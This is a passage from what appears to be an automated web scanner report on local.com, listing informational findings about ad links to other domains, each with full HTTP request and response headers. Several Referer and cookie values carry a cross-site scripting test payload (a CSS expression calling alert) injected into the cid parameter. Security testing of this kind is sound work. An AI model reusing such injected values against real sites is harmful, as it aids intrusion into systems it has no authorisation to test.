<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748882748?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748882748?" border="0" alt="" /></a>
...[SNIP]...

8.10. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f%22style%3d%22x%3aexpression(alert(1))%22fccc9411126
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.1.10.1296748820; __qca=P0-30084348-1296748820628; ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506&exp=634323183968705455

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:09 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?" border="0" alt="" /></a>
...[SNIP]...

8.11. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748870273&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/equity-bank-63975058/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748870273?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748870273?" border="0" alt="" /></a>
...[SNIP]...

8.12. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748884962&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748884962?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748884962?" border="0" alt="" /></a>
...[SNIP]...

8.13. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748884962&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:13 GMT
Connection: close
Content-Length: 834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748884962?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748884962?" border="0" alt="" /></a>
...[SNIP]...

8.14. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 15:59:57 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748812638?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748812638?" border="0" alt="" /></a>
...[SNIP]...

8.15. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.sp&sz=491x223&ord=1296748848750&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.2.10.1296748820; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:27 GMT
Connection: close
Content-Length: 834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748848750?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748848750?" border="0" alt="" /></a>
...[SNIP]...

8.16. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag\\x3dTrue\\x26css\\x3dbanner\\x26p\\x3dlocm.sp\\x26pos\\x3d1\\x26t\\x3d1\\x26sz\\x3d728x90\\x26ord\\x3d1296748848750\\x26k\\x3dbanks\\x26l\\x3dDallas%2C+TX\\x26cat\\x3dcat%3Dfinancial_services\\x26zone\\x3dlocm.sp%2Fretail_banks_15020100\ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 768
Date: Thu, 03 Feb 2011 16:43:52 GMT
Content-Length: 768
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/;dcopt=ist;kw=;pos=;tile=;city=;sz=;ord=9159411650520743936?" target="_blank"><img src="http://ad.doubleclick.net/ad/;dcopt=ist;kw=;pos=;tile=;city=;sz=;ord=9159411650520743936?" border="0" alt="" /></a>
...[SNIP]...

8.17. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748869864&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748869864?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748869864?" border="0" alt="" /></a>
...[SNIP]...

8.18. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748884962&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748884962?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748884962?" border="0" alt="" /></a>
...[SNIP]...

8.19. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
